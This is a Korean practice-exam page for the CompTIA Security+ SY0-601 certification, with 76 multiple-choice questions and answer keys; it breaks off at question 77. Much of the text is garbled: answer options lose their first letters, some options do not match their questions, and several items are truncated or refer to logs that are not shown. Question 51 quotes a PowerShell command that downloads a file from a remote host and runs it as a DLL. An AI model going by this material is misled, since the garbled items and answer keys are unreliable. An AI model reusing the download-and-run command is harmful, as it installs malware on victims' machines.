아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

SY0-601 모의고사를 통해 CompTIA Security+ 시험에 전략적으로 대비할 수 있습니다

CompTIA Security+ SY0-601 자격증을 효과적으로 준비하려면 고품질의 시험 리소스에 액세스하는 것이 필수적입니다. 시험 내용과 목표를 정확하게 반영한 모의고사 문제와 답안을 통해 추가 학습이 필요한 영역을 파악할 수 있습니다. 포괄적인 학습 가이드는 위험 관리, 사고 대응, 암호화 및 보안 아키텍처와 같은 주제에 대한 심층적인 설명을 제공합니다. 신뢰할 수 있는 출처의 동영상 강좌는 핵심 개념을 강화할 수 있는 매력적인 방법을 제공합니다. 실제 시험 환경을 시뮬레이션한 모의 시험은 시간 관리 능력과 시험 형식에 대한 친숙함을 키우는 데 도움이 됩니다. 이러한 시험 자료로 정기적으로 연습하면 SY0-601 시험에서 다루는 보안 기본 사항에 대한 이해를 강화하는 데 도움이 됩니다. 다양한 학습 자료, 연습 문제, 모의고사를 준비에 활용하면 CompTIA Security+ 인증 시험에 성공적으로 합격할 확률이 높아집니다.
다른 온라인 시험에 응시하세요

질문 #1
최고 정보 보안 책임자는 공용 USB 충전소를 사용할 때 직원 휴대폰에서 민감한 정보가 유출되는 것을 방지하고자 합니다. 다음 중 구현하기에 가장 적합한 솔루션은 무엇인가요?
A. LP
B. SB 데이터 차단기
C. SB OTG
D. SB 포트 비활성화
답변 보기
정답: B
질문 #2
한 회사는 최근 경쟁업체에 독점 정보가 유출되어 상당한 데이터 손실을 경험했습니다. 이 회사는 적절한 라벨을 사용하여 특별한 예방 조치를 취했지만 이메일 필터 로그에는 사고에 대한 기록이 없습니다. 조사 결과 회사 네트워크는 침해되지 않았지만 직원의 COPE 태블릿에서 문서가 다운로드되어 클라우드 스토리지를 통해 경쟁업체로 전달된 것으로 확인되었습니다. 다음 중 이 데이터 유출에 대한 최선의 해결책은 무엇인가요?
A. 사용자 교육
B. ASB
C. DM
D. LP
답변 보기
정답: B
질문 #3
두 조직은 각자의 회사를 위한 새로운 SIEM 솔루션 평가에 협력할 계획입니다. 두 조직의 SOC 팀이 힘을 합치면 작업 속도를 높일 수 있을 것입니다. 다음 중 이 계약을 문서화하기 위해 작성할 수 있는 것은 무엇인가요?
A. OU
B. SA
C. LA
D. DA
답변 보기
정답: A
질문 #4
조직의 최고 경영자(CEO)는 직원들이 팬데믹이나 위기 상황을 포함하여 업무 시간 중 언제든 유연하게 재택근무를 할 수 있기를 원합니다. 그러나 CEO는 일부 직원이 유연 근무제를 악용하여 고위험 국가에서 휴가 중에 근무하거나 다른 국가의 타사 조직에 업무를 아웃소싱할 수 있다고 우려합니다. 최고 정보 책임자(CIO)는 회사가 몇 가지 기본적인 통제를 구현하여 마조를 완화할 수 있다고 생각합니다
A. RAT가 설치되어 추가 익스플로잇 툴을 전송하고 있습니다
B. 워크스테이션이 명령 및 제어 서버에 비콘을 보내고 있습니다
C. 논리 폭탄이 실행되어 데이터 전송을 담당합니다
D. 컬 네트워크 환경에서 파일리스 바이러스가 확산되고 있습니다
답변 보기
정답: AB
질문 #5
네트워크 엔지니어와 보안 엔지니어가 네트워크 운영을 모니터링하는 방법에 대해 논의하고 있습니다. 다음 중 가장 좋은 방법은 무엇인가요?
A. 넷을 비활성화하고 SSH를 강제 설정합니다
B. 지속적인 핑을 설정합니다
C. 이전트 없는 모니터를 활용하세요
D. 비밀번호를 사용하여 SNMPv3를 사용 설정합니다
답변 보기
정답: C
질문 #6
다음 중 일반적으로 사람과 인공 지능을 조합하여 이벤트 데이터를 분석하고 개입 없이 조치를 취하는 데 사용하는 것은 무엇인가요?
A. TP
B. SINT
C. OAR
D. IEM
답변 보기
정답: C
질문 #7
한 회사에서 민감한 데이터를 저장하는 모든 애플리케이션에 MFA를 구현하고 있습니다. IT 관리자는 MFA가 중단되지 않고 사용자 친화적이기를 원합니다. IT 관리자가 MFA를 구현할 때 사용해야 하는 기술은 다음 중 어느 것입니까?
A. 회용 비밀번호
B. 메일 토큰
C. 시 알림
D. 드웨어 인증
답변 보기
정답: C
질문 #8
다음 중 특정 조직에 민감한 광범위한 정보를 설명하는 용어는 무엇인가요?
A. ublic
B. 급 비밀
C. 점
D. 픈 소스
답변 보기
정답: C
질문 #9
한 조직에서 자연재해 발생 시 운영을 지속하기 위해 다른 데이터 센터를 열 계획입니다. 다음 중 조직의 회복탄력성을 가장 잘 지원할 수 있는 고려 사항은 무엇인가요?
A. 리적 분산
B. 전기 전력
C. 재 진압
D. 설 자동화
답변 보기
정답: A
질문 #10
다음 중 조직이 데이터 유출을 처음 인지하는 데 사용되는 제어 기능은 무엇인가요?
A. 호
B. 방
C. 정
D. etective
답변 보기
정답: D
질문 #11
조직의 정보 보안 관리자가 처음으로 PCI DSS 자체 평가를 완료하고 있습니다. 다음 중 이러한 유형의 평가가 필요한 가장 큰 이유는 무엇인가요?
A. 재 해외 확장 프로젝트가 진행 중입니다
B. 부 컨설턴트는 이 도구를 사용하여 보안 성숙도를 측정합니다
C. 직에서 신용카드 정보를 처리할 것으로 예상됩니다
D. 부 규제 기관에서 이 감사를 완료하도록 요청했습니다
답변 보기
정답: C
질문 #12
병원의 네트워크에 연결된 자기 공명 영상(MRI) 스캐너는 오래되고 지원되지 않는 특수 Windows OS로 제어 및 작동됩니다. 다음 중 병원의 IT 관리자가 특수 OS를 업그레이드하지 못할 가능성이 가장 높은 것은 무엇인가요?
A. MRI 공급업체가 시스템을 업그레이드하는 데 필요한 시간은 환자에게 부정적인 영향을 미칠 수 있습니다
B. MRI 공급업체는 최신 버전의 OS를 지원하지 않습니다
C. S를 변경하면 MRI 공급업체와의 지원 SLA를 위반하게 됩니다
D. IT 팀에는 MRI 스캐너를 업그레이드하는 데 필요한 예산이 없습니다
답변 보기
정답: B
질문 #13
공격자는 타사 소프트웨어 공급업체에 침투하는 것이 운영에 영향을 미치는 가장 좋은 방법이라고 판단했습니다. 다음 중 어떤 벡터가 악용되고 있나요?
A. 소셜 미디어
B. loud
C. 급망
D. 회 공학
답변 보기
정답: C
질문 #14
대규모 MSSP의 SOC는 최근 해결에 너무 오랜 시간이 걸렸던 사고에서 얻은 교훈을 논의하기 위해 회의를 하고 있습니다. 이러한 유형의 사고는 최근 몇 주 동안 더 자주 발생하고 있으며 수동 작업으로 인해 분석가들의 시간이 많이 소모되고 있습니다. 다음 중 SOC가 응답 시간을 가장 잘 개선하기 위해 고려해야 할 솔루션은 무엇인가요?
A. 위치 포트 분석기를 사용하여 NIDS 어플라이언스를 구성합니다
B. OSINT를 수집하고 중앙 저장소에 아티팩트를 카탈로그화합니다
C. 용자 지정 가능한 플레이북으로 SOAR를 구현합니다
D. 뮤니티 기반 위협 인텔리전스를 갖춘 SIEM을 설치하세요
답변 보기
정답: C
질문 #15
한 보안 분석가가 회사 데이터를 공개적으로 사용할 수 있는지 확인하기 위해 정보를 수집하기 위해 OSINT를 사용하고 있습니다. 다음 중 분석가가 사용하기에 가장 적합한 애플리케이션은 무엇인가요?
A. he하베스터
B. uckoo
C. map
D. essus
답변 보기
정답: A
질문 #16
다음 중 조직이 완화 단계의 우선 순위를 정할 수 있도록 알려진 취약점에 대한 계산된 값을 제공하는 것은 무엇인가요?
A. VSS
B. IEM
C. OAR
D. VE
답변 보기
정답: A
질문 #17
비즈니스 파트너는 거래를 안전하게 검증하기 위한 보안 메커니즘을 개발 중입니다. 한 회사가 거래 파일의 서명, 암호화 및 암호 해독에 사용되는 아티팩트를 등록하고 발급하는 신뢰할 수 있는 솔루션을 배포할 책임이 있어야 합니다. 다음 중 채택하기에 가장 적합한 솔루션은 무엇인가요?
A. PKI
B. 블록체인
C. SAML
D. OAuth
답변 보기
정답: A
질문 #18
다음 중 금융 정보가 포함된 데이터 아카이브와 관련된 알려진 보안 위험은 무엇인가요?
A. 규제 지침에서 요구하는 기간보다 오래 보관할 경우 데이터는 법적 책임이 될 수 있습니다
B. 데이터는 침해를 방지하고 비즈니스 요구 사항을 충족하기 위해 반드시 오프사이트에 보관해야 합니다
C. 회사는 전자증거개시 요청에 보관된 데이터를 제공하는 것이 금지됩니다
D. 호화되지 않은 아카이브는 가능한 한 오래 보존하고 암호화해야 합니다
답변 보기
정답: A
질문 #19
잘 알려진 한 조직이 APT의 공격을 받고 있습니다. 이 조직은 맞춤형 멀웨어가 생성되어 회사로 이메일로 전송되거나 주차장에 떨어진 USB 스틱에 설치되는 것을 우려하고 있습니다. 다음 중 이 시나리오에 대한 최선의 방어책은 무엇인가요?
A. 0분마다 업데이트하도록 서명 기반 백신 구성하기
B. 이메일에 S/MIME을 적용하고 USB 드라이브 삽입 시 자동으로 암호화하기
C. 수 없는 소프트웨어에 대해 샌드박스에서 애플리케이션 실행 구현하기
D. 지털 서명이 없는 경우 새 파일에 대한 취약점 검사
답변 보기
정답: C
질문 #20
보안 규정 준수 평가의 일환으로 감사자는 자동화된 취약성 스캔을 수행합니다. 또한 감사자가 평가를 완료하려면 다음 중 어떤 작업을 수행해야 하나요?
A. 용자 행동 분석
B. 킷 캡처
C. 성 검토
D. 그 분석
답변 보기
정답: C
질문 #21
IT 보안 관리자가 공개적으로 사용 가능한 회사 정보에 대한 보고서를 요청합니다. 관리자의 우려는 악의적인 공격자가 적극적인 정찰을 하지 않고도 데이터에 액세스할 수 있다는 것입니다. 다음 중 분석을 수행하는 가장 효율적인 접근 방식은 무엇인가요?
A. 베스터 도구에 도메인 파라미터를 제공합니다
B. nsenum을 사용하여 공개 DNS 항목을 확인합니다
C. 장 기업의 IP를 대상으로 네서스 취약점 스캔을 수행합니다
D. 모든 포트 스캔 및 스니키 모드 옵션을 사용하여 nmap을 실행합니다
답변 보기
정답: A
질문 #22
보안 분석가가 네트워크 엣지에서 비정상적인 양의 트래픽이 발생하는 것을 발견합니다. 로그를 검토한 분석가는 소스 IP 주소를 식별하고 해당 주소가 네트워크와 통신하지 못하도록 차단합니다. 분석가가 이 주소를 차단했음에도 불구하고 공격은 여전히 진행 중이며 수많은 다른 소스 IP 주소에서 발생하고 있습니다. 다음 중 이 유형의 공격을 설명하는 것은 무엇인가요?
A. DoS
B. 한 에스컬레이션
C. NS 중독
D. 퍼 오버플로
답변 보기
정답: A
질문 #23
다음 중 위험 전가의 예는 무엇인가요?
A. 험 가입
B. 약한 서버 패치 적용
C. 래된 애플리케이션 폐기
D. 플리케이션 소유자 위험 승인
답변 보기
정답: A
질문 #24
다음 중 여러 사람이 고유한 카드 스와이프를 사용하여 보안 출입구에 입장하는 것을 방지하기 위해 사용할 수 있는 보안 제어는 무엇인가요?
A. 방문자 로그
B. 러데이 케이지
C. 입 통제 현관
D. 작 감지 센서
답변 보기
정답: C
질문 #25
소매 회사의 마케팅 부서에서 내부 웹사이트를 인터넷에 게시하여 제한된 수의 특정 외부 서비스 제공업체가 안전한 방식으로 접근할 수 있도록 하려고 합니다. 다음 중 이 요구 사항을 충족하는 데 가장 적합한 구성은 무엇인가요?
A. AC
B. CL
C. AF
D. AT
답변 보기
정답: B
질문 #26
한 회사가 기술 풋프린트를 최소화하기 위해 일부 서버를 클라우드로 마이그레이션하려고 합니다. 이 회사는 사내에 고객 관계 관리 시스템을 보유하고 있습니다. 다음 중 회사의 인프라 및 애플리케이션 지원이 가장 적게 필요한 솔루션은 무엇인가요?
A. aaS
B. aaS
C. aaS
D. DN
답변 보기
정답: A
질문 #27
사이버 보안 분석가가 웹 서버의 로그 파일을 검토하다가 디렉터리 탐색 공격이 발생했음을 나타내는 일련의 파일을 발견했습니다. 다음 중 분석가가 가장 가능성이 높은 것은 무엇인가요?
A. ttp://sample
B. ttp://sample
C. ttp://sample
D. ttp://redirect
답변 보기
정답: B
질문 #28
한 보안 설계자가 비즈니스 파트너를 위한 원격 액세스 솔루션을 설계하고 있습니다. 비즈니스 파트너는 회사의 Linux 서버 한 대에 액세스해야 합니다. 비즈니스 파트너는 인증 및 추가 소프트웨어 설치를 위해 비밀번호를 관리하지 않기를 원합니다. 다음 중 아키텍트가 권장해야 하는 것은 무엇인가요?
A. 프트 토큰
B. 마트 카드
C. SR
D. SH 키
답변 보기
정답: D
질문 #29
보안 분석가가 위험 관리 프로그램을 개발하기 위해 표준을 참조하려고 합니다. 다음 중 분석가가 사용하기에 가장 좋은 소스는 무엇인가요?
A. SAE SOC 2
B. SO 31000
C. IST CSF
D. DPR
답변 보기
정답: B
질문 #30
다음 중 인터넷을 사용하는 애플리케이션의 코드 개발을 타사 계약업체에 아웃소싱할 때 가장 큰 보안 우려는 무엇인가요?
A. 지적 재산 도용
B. 한 상승
C. 수 없는 백도어
D. 질 보증
답변 보기
정답: C
질문 #31
다음 중 소프트웨어의 변경 사항을 추적 및 문서화하고 파일 및 시스템에 대한 액세스를 관리하는 것을 가장 잘 설명하는 개념은 무엇인가요?
A. 버전 관리
B. 속적인 모니터링
C. 장 절차
D. 동화
답변 보기
정답: A
질문 #32
다음 중 사용자가 무단 이동식 미디어에 액세스하는 것을 방지하는 데 효과적인 도구는 무엇인가요?
A. SB 데이터 차단기
B. 러데이 케이지
C. 접 리더
D. 이블 잠금
답변 보기
정답: A
질문 #33
보안 분석가가 인시던트 발생 후 웹 서버에 대한 취약점 스캔 보고서를 검토하고 있습니다. 서버를 익스플로잇하는 데 사용된 취약점이 과거 취약점 스캔 보고서에 존재하며 해당 취약점에 대한 패치를 사용할 수 있습니다. 다음 중 가장 가능성이 높은 원인은 무엇인가요?
A. 안 패치가 사용자에게 영향을 미쳐 제거되었습니다
B. 격자가 취약점 스캔 보고서를 변경했습니다
C. 서버를 익스플로잇하는 데 제로데이 취약점이 사용되었습니다
D. 검사에서 취약점에 대해 잘못된 음성이 보고되었습니다
답변 보기
정답: A
질문 #34
보안 분석가가 IP 주소 10.10.1.1에 위치한 웹 서버에서 의심스러운 트래픽을 조사하고 있습니다. WAF 로그를 검색한 결과 다음 중 가장 가능성이 높은 것은 무엇인가요?
A. SS 공격
B. QLi 공격
C. 플레이 공격
D. SRF 공격
답변 보기
정답: B
질문 #35
다음 중 조직 전체에 더 깊이 있고 폭넓은 지식을 제공하는 정책은 무엇인가요?
A. 산 관리 정책
B. 무 분리 정책
C. 용 정책
D. 무 순환 정책
답변 보기
정답: D
질문 #36
다음 중 열 조절을 위한 감지 및 수정 제어 기능을 가장 잘 제공하는 것은 무엇인가요?
A. 기 감지기
B. 재 경보
C. VAC 시스템
D. 화재 진압 시스템
E. uards
답변 보기
정답: C
질문 #37
보안 분석가가 시스템 관리자가 휴가 중일 때마다 특정 파일이 삭제되는 것을 발견했습니다. 다음 중 실행 중인 멀웨어의 유형을 가장 잘 설명하는 것은 무엇인가요?
A. 일리스 바이러스
B. 리 폭탄
C. 로거
D. 섬웨어
답변 보기
정답: B
질문 #38
다음 중 네트워크에서 데이터 유출을 막거나 방지하는 데 효과적인 도구는 무엇인가요?
A. LP
B. IDS
C. PM
D. DE
답변 보기
정답: A
질문 #39
웹사이트 방문자는 웹사이트 양식의 특정 필드에 올바른 형식의 정보를 제공해야 합니다. 다음 중 이 의무를 위해 가장 많이 사용되는 보안 조치는 무엇인가요?
A. 력 유효성 검사
B. 드 서명
C. QL 주입
D. 식 제출
답변 보기
정답: A
질문 #40
보안 관리자가 서버에서 불필요한 서비스가 실행 중일 수 있다고 의심합니다. 다음 중 관리자가 이러한 의심을 확인하기 위해 가장 많이 사용할 수 있는 도구는 무엇인가요?
A. map
B. 이어샤크
C. 검
D. NSEnum
답변 보기
정답: A
질문 #41
한 회사에서 공공장소에 WiFi 액세스 포인트를 배포하고 보안을 강화하기 위해 구성을 강화하려고 합니다. 평가를 수행한 후 분석가는 액세스 포인트가 WPA3, AES, WPS 및 RADIUS를 사용하도록 구성되어 있음을 확인합니다. 분석가가 액세스 포인트 보안을 강화하기 위해 비활성화해야 하는 것은 다음 중 어느 것입니까?
A. PA3
B. ES
C. ADIUS
D. PS
답변 보기
정답: D
질문 #42
한 제조 회사에는 소프트웨어 호환성 문제로 인해 최신 OS로 마이그레이션할 수 없는 일회성 레거시 정보 시스템이 여러 개 있습니다. OS는 공급업체에서 계속 지원하지만 산업용 소프트웨어는 더 이상 지원되지 않습니다. 최고 정보 보안 책임자는 이러한 시스템에 대한 복원력 계획을 수립하여 비운영 환경에 OS 패치를 설치하는 동시에 복구를 위한 시스템 백업을 생성할 수 있도록 했습니다. 다음 중 어떤 복원력 기술이
A. 복성
B. AID 1+5
C. 상 머신
D. 체 백업
답변 보기
정답: C
질문 #43
새로운 보안 엔지니어가 시스템 강화 작업을 시작했습니다. 이 엔지니어가 사용하고 있는 강화 기술 중 하나는 NAS에 대한 원격 로그인을 비활성화하는 것입니다. 이제 사용자들은 사용자 PC에서 데이터를 볼 수 있음에도 불구하고 SCP를 사용하여 NAS로 파일을 전송할 수 없다고 보고하고 있습니다. 다음 중 이 문제의 가장 가능성이 높은 원인은 무엇입니까?
A. 컬 호스트에서
A. FTP가 비활성화되었습니다
B. 성 파일을 수정하는 대신 B
C. 격 로그인이 sshd
D. etwork 서비스가 더 이상 NAS에서 실행되지 않습니다
답변 보기
정답: B
질문 #44
최근 한 조직에서 개발자가 매일 밤 리포지토리에서 코드 검사를 실행하도록 하는 소프트웨어 보증 정책을 발표했습니다. 첫날 밤이 지난 후 보안 팀은 개발자에게 2,000개 이상의 발견 사항이 보고되었으며 해결해야 한다고 경고했습니다. 다음 중 발견 건수가 많은 원인으로 가장 가능성이 높은 것은 무엇인가요?
A. 취약점 스캐너가 제대로 구성되지 않아 많은 수의 오탐을 발생시켰습니다
B. 타사 라이브러리가 리포지토리에 로드되었으므로 코드베이스에서 제거해야 합니다
C. 약점 스캐너가 런타임 중에 여러 메모리 누수를 발견하여 동일한 문제에 대한 중복 보고가 발생했습니다
D. 취약점 스캐너에 올바른 벤치마크가 로드되지 않았으므로 업데이트해야 합니다
답변 보기
정답: A
질문 #45
보안 관리자가 액세스 스위치의 ARP 테이블을 검토하면 다음과 같은 출력을 볼 수 있습니다:
A. a0/2 포트의
A. DoS
B. a0/2 포트의 B
C. a0/1 포트의 C
D. 트 Fa0/1의 D
답변 보기
정답: B
질문 #46
한 보안 분석가가 회사의 클라우드 환경에서 데이터를 수집하기 위해 여러 보안 솔루션에 권한을 부여할 때의 위험을 평가하고 있습니다. 다음 중 이러한 통합의 즉각적인 결과는 무엇인가요?
A. 이터 주권 규칙 미준수
B. 급업체 상호운용성 지원 상실
C. IEM 솔루션 의무 배포
D. 격 표면의 증가
답변 보기
정답: D
질문 #47
다음 중 테일게이트를 가장 잘 방지할 수 있는 제어 기능은 무엇인가요?
A. 입 통제 현관
B. 쇄회로 텔레비전
C. 접 카드 리더기
D. 러데이 케이지
답변 보기
정답: A
질문 #48
한 보안 분석가가 조직의 취약성의 심각도 수준을 경영진에게 전달하는 데 도움이 되는 솔루션을 찾고 있습니다. 다음 중 이 요구 사항을 가장 잘 충족하는 것은 무엇인가요?
A. VE
B. IEM
C. OAR
D. VSS
답변 보기
정답: D
질문 #49
다음 중 단일 방화벽을 통해 인바운드 인터넷 트래픽을 통합하고 여러 클라우드 환경으로 전달하기 위해 사용할 수 있는 구성 요소는 무엇인가요?
A. 랜짓 게이트웨이
B. loud 핫 사이트
C. 지 컴퓨팅
D. NS 싱크홀
답변 보기
정답: A
질문 #50
조직은 운영 상태로 배포하기 전에 패치를 개발하고 테스트하는 여러 환경을 유지 관리합니다. 다음 중 운영 상태로 배포되기 직전에 패치가 배포되는 환경은 무엇인가요?
A. 발
B. est
C. 산
D. 테이징
답변 보기
정답: D
질문 #51
한 직원이 Updates.lnk라는 비정상적인 파일이 첨부된 이메일을 받았습니다. 보안 분석가가 이 파일의 기능을 리버스 엔지니어링한 결과 다음 스크립트를 실행하는 것을 발견했습니다.C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll다음 중 분석가가 찾은 내용을 가장 잘 설명하는 것은 어느 것이 맞습니까?
A. PowerShell 코드가 DLL 인젝션을 수행 중입니다
B. PowerShell 코드가 그림을 표시하고 있습니다
C. PowerShell 코드가 환경 변수를 구성하고 있습니다
D. PowerShell 코드가 Windows 업데이트 설정을 변경하고 있습니다
답변 보기
정답: A
질문 #52
보안 분석가가 호스트가 멀웨어에 감염되어 컴퓨터 로그를 검토하고 있습니다. 컴퓨터가 감염된 후 오류 화면이 표시되고 종료되었습니다. 다음 중 분석가가 자세한 정보를 확인하기 위해 가장 먼저 검토해야 하는 것은 무엇인가요?
A. ump 파일
B. 스템 로그
C. 애플리케이션 로그
D. 안 로그
답변 보기
정답: A
질문 #53
다음 중 장비가 고장 나기 전에 작동하는 평균 시간을 측정하는 것은 무엇인가요?
A. LE
B. TBF
C. TO
D. RO
답변 보기
정답: B
질문 #54
다음 중 퍼블릭 클라우드에서 애플리케이션을 호스팅할 때 특히 관련된 위험은 무엇인가요?
A. 보안되지 않은 루트 계정
B. 로데이
C. 유 테넌트
D. 부자 위협
답변 보기
정답: C
질문 #55
공격자가 디지털 서명된 문서를 눈에 띄지 않는 다른 버전으로 대체합니다. 문서 내용을 검토한 작성자는 원래 문서에 없었지만 무결성 문제를 확인할 수 없는 몇 가지 추가 문구를 발견합니다. 다음 중 어떤 공격이 사용되었나요?
A. 립토 멀웨어
B. 시 대체
C. 돌
D. hishing
답변 보기
정답: B
질문 #56
보안 엔지니어는 한 사무실에 두 개의 무선 라우터를 배포해야 합니다. 사무실 건물의 다른 세입자는 이 무선 네트워크에 연결할 수 없어야 합니다.엔지니어가 가장 강력한 암호화를 보장하기 위해 구현해야 하는 프로토콜은 다음 중 어느 것입니까?
A. PS
B. PA2
C. AP
D. TTPS
답변 보기
정답: B
질문 #57
보안 인시던트가 해결되었습니다. 다음 중 인시던트 대응 계획의 마지막 단계의 중요성을 가장 잘 설명하는 것은 무엇인가요?
A. 팀이 얼마나 잘 대응했는지 조사하고 문서화하며, 사고의 원인을 파악하고 향후 사고를 방지할 수 있는 방법을 결정합니다
B. 시스템이 완전히 패치되고, 데이터가 복원되고, 취약점이 해결되면 영향을 받은 시스템을 다시 운영 환경으로 되돌립니다
C. 침해 사고와 침해 범위, 운영 환경에 미치는 영향, 침해 지점을 식별합니다
D. 향을 받는 시스템을 포함하고 네트워크에서 연결을 끊어 공격 또는 침해의 추가 확산을 방지합니다
답변 보기
정답: A
질문 #58
다음 중 파일 해시를 게시하는 이유는 무엇인가요?
A. 파일의 무결성을 검증하기 위해
B. 소프트웨어가 디지털 서명되었는지 확인하기 위해
C. 시를 소프트웨어 활성화 키로 사용하려면
D. 시를 복호화 암호 구문으로 사용하려면
답변 보기
정답: A
질문 #59
온라인 스트리밍 서비스를 제공하는 한 회사는 이름과 이메일 주소 등 고객의 개인 데이터를 클라우드 스토리지 서비스에 공개했습니다. 그 결과 이 회사는 사용자 계정 삭제 요청 건수가 증가했습니다. 다음 중 이 데이터 공개로 인한 결과를 가장 잘 설명하는 것은 무엇인가요?
A. 규제 벌금
B. 판 손상
C. 험 비용 증가
D. 정적 손실
답변 보기
정답: B
질문 #60
다음 중 회계 부서에서 사기 거래로 인한 손실을 줄이기 위해 가장 적합한 제어 유형은 무엇인가요?
A. 구
B. 제
C. 정
D. etective
답변 보기
정답: D
질문 #61
보안 분석가가 회사의 SIEM으로부터 로컬 소스 IP 주소 192.168.34.26에서 비정상적인 활동이 발생하고 있다는 알림을 받습니다. 최고정보보안책임자는 분석가에게 원본 소스를 차단하도록 요청합니다. 며칠 후, 다른 직원이 취약성 스캔이 더 이상 제대로 수행되지 않는다는 내용의 내부 티켓을 엽니다. 직원이 제공한 IP 주소는 192.168.34.26입니다. 다음 중 이 유형의 경고를 설명하는 것은 무엇인가요?
A. 진정한 음성
B. 정한 양성
C. 탐
D. 짓 음성
답변 보기
정답: C
질문 #62
회사는 일상 업무를 중단하지 않고 의사 결정 포인트와 관련 사고 대응 조치를 테스트할 수 있는 실제 시나리오를 사용하여 업데이트된 사고 대응 계획을 검증해야 합니다. 다음 중 회사의 요구 사항을 가장 잘 충족하는 것은 무엇인가요?
A. 레드팀 운동
B. 깃발 뺏기 연습
C. 상용 운동
D. 싱 연습
답변 보기
정답: C
질문 #63
조직의 최고 보안 책임자(CSO)는 사고 대응 계획의 유효성과 철저함을 보장하기 위해 비즈니스의 사고 대응 계획 참여를 검증하고자 합니다. 다음 중 CSO가 가장 많이 사용할 가능성이 높은 것은 무엇인가요?
A. 부 보안 평가
B. 버그 바운티 프로그램
C. 탁상용 운동
D. 레드팀 참여
답변 보기
정답: C
질문 #64
한 대형 제조 회사가 내부 인프라를 업데이트하고 얼마 전 OAuth 애플리케이션이 기업 데이터에 액세스할 수 있도록 허용하기 시작했습니다. 이제 데이터 유출이 보고되고 있습니다. 다음 중 문제의 원인일 가능성이 가장 높은 것은 무엇인가요?
A. 권한 크리프
B. 정되지 않은 기본 설정
C. LS 프로토콜 취약점
D. 적절한 패치 관리
답변 보기
정답: B
질문 #65
한 소매업체 임원이 최근 주요 경쟁업체의 이직을 수락했습니다. 다음 주, 보안 분석가가 보안 로그를 검토한 결과 퇴사한 임원의 계정에 액세스하려는 로그온 시도가 성공한 것을 확인했습니다. 다음 중 이 문제를 해결할 수 있는 보안 관행은 무엇인가요?
A. 공개 계약
B. 소 권한
C. 용 제한 정책
D. 프보딩
답변 보기
정답: D
질문 #66
보안 분석가가 모의 침투 테스트 보고서를 조사하고 있습니다. 모의 침투 테스트 중에 컨설턴트가 백엔드 서버에서 민감한 데이터를 다운로드할 수 있었습니다. 백엔드 서버는 회사의 모바일 애플리케이션에서만 사용할 수 있어야 하는 API를 노출하고 있었습니다. 백엔드 서버 로그를 검토한 보안 분석가가 다음 항목을 발견했습니다. 다음 중 보안 제어 우회의 원인으로 가장 가능성이 높은 것은 무엇인가요?
A. P 주소 허용 목록
B. 용자 에이전트 스푸핑
C. AF 바이패스
D. 퍼러 조작
답변 보기
정답: B
질문 #67
다음 중 일관되고 감사 가능한 사고 대응 프로세스를 구축하기 위한 최선의 조치는 무엇인가요?
A. 신입사원에게 외부 지식을 지속적으로 업데이트하도록 장려합니다
B. 조직에서 쉽게 액세스할 수 있는 중앙 리포지토리에 문서를 게시합니다
C. 로세스에 대해 의견을 제시할 수 있는 자격을 각 IT 사일로의 주제별 전문가로 제한합니다
D. 조직 내 공유 책임 모델을 육성하기 위해 CIRT 멤버를 순환 배치합니다
답변 보기
정답: D
질문 #68
한 회사가 리테일 웹사이트를 퍼블릭 클라우드 제공업체로 이전하려고 합니다. 이 회사는 신용 카드 데이터를 토큰화하되 클라우드 제공업체가 저장된 신용 카드 정보를 볼 수 없도록 하려고 합니다. 다음 중 이러한 목표를 가장 잘 충족하는 것은 무엇인가요?
A. AF
B. ASB
C. PN
D. LS
답변 보기
정답: B
질문 #69
한 회사가 인증서 관리 프로세스를 간소화하려고 합니다. 이 회사는 수십 개의 하위 도메인이 있는 단일 도메인을 가지고 있으며 모두 인터넷에서 공개적으로 액세스할 수 있습니다. 다음 중 이 회사가 구현해야 하는 인증서 유형을 가장 잘 설명하는 것은 무엇인가요?
A. 목 대체 이름
B. 일드카드
C. 체 서명
D. 메인 유효성 검사
답변 보기
정답: B
질문 #70
한 보안 분석가가 host1.pcap이라는 파일을 생성하여 추가 인시던트 분석에 사용할 팀원과 공유했습니다. 다음 중 다른 팀원이 이 파일을 여는 데 사용할 가능성이 가장 높은 도구는 무엇인가요?
A. 검
B. emdump
C. TK 이미저
D. 이어샤크
답변 보기
정답: D
질문 #71
데이터 집합을 담당하는 관리자가 보안 엔지니어에게 하드 디스크의 데이터에 암호화를 적용해 달라고 요청했습니다. 보안 엔지니어는 __________.
A. 이터 컨트롤러
B. ata 소유자
C. 이터 관리자입니다
D. 이터 프로세서
답변 보기
정답: C
질문 #72
보안 관리자는 회사 방화벽을 사용하여 TCP 연결을 차단해야 합니다. 이 연결은 잠재적으로 위협이 될 수 있으므로 관리자는 RST를 다시 보내고 싶지 않습니다. 다음 중 방화벽 규칙에서 가장 잘 작동하는 작업은 무엇인가요?
A. rop
B. 부
C. 그 알림
D. 가
답변 보기
정답: A
질문 #73
보안 관리자는 기업 네트워크에서 전송 중인 파일을 검사하여 PII, 신용카드 데이터 및 분류 단어를 검색해야 합니다. 다음 중 어떤 것을 사용하는 것이 가장 좋을까요?
A. DS 솔루션
B. DR 솔루션
C. IPS 소프트웨어 솔루션
D. etwork DLP 솔루션
답변 보기
정답: D
질문 #74
핫스팟(드래그 앤 드롭은 지원되지 않음)프로덕션 환경에서 사고가 발생했습니다.지침명령 출력을 분석하고 침해 유형을 식별합니다.언제든지 시뮬레이션의 초기 상태로 되돌리려면 모두 재설정 버튼을 클릭하세요.핫 영역:
A. 답변은 설명 섹션을 참조하세요
답변 보기
정답: A
질문 #75
다음 중 특정 산업 또는 그룹 내의 사용자를 감염시키는 것을 목표로 하는 표적 공격은 무엇인가요?
A. 터링 홀
B. 타 스쿼팅
C. oax
D. 칭
답변 보기
정답: A
질문 #76
한 회사가 클라우드에 플랫 네트워크를 보유하고 있습니다. 이 회사는 서버를 새 네트워크로 마이그레이션하지 않고 프로덕션 서버와 비프로덕션 서버를 세분화할 수 있는 솔루션을 구현해야 합니다. 다음 중 이 회사가 구현해야 하는 솔루션은 무엇인가요?
A. 트라넷
B. 단된 서브넷
C. LAN 세분화
D. 로 트러스트
답변 보기
정답: C
질문 #77
